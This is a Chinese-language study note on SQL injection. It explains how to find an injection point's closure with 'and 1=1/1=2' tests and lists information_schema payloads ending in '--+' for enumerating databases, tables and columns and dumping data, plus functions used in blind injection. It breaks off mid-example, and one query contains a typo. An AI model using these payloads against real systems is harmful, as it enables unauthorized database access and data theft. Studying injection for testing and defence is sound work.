SQL基础:
注入点的判断:
首先判断该注入点是怎么闭合的,常用的是','),')),",再利用and 1=2,and 1=1判断闭合是否正确
sql注入常用语句:
普通语句:schema_name——数据库名;table_name——表名;column_name——字段名;
查询数据库:select schema_name from information_schema.schemata--+
查询数据库表:select table_name from information_schema.tables where table_schema='数据库名'--+
查询字段名:select column_name from infromation_columns where table_name='表名'--+
查询字段内容:select * from 表名--+
盲注:
先介绍几个常用的函数:
left(a,b)-----查询a中数据,返回b个字符
substr(s,n,len)------从字符串s中返回一个长度同len字符相同的字符串,起始于位置n,另外要注意的是,该函数起始位置是1,不是0
CAST函数:语法规则是:Cast(字段名 as 转换的类型 ),进行数据类型转换
limit a,b--------a决定返回第几行的数据,而b决定返回几行数据
ORD() 函数:ORD() 函数返回字符串第一个字符的
MySQL IFNULL函数是MySQL控制流函数之一,它接受两个参数,如果不是NULL,则返回第一个参数。 否则,IFNULL函数返回第二个参数。
ascii----返回asciii值
Regexp:是一个正则表达式
接下来就是盲注常用的语句了:
查看数据库名字长度:id=1&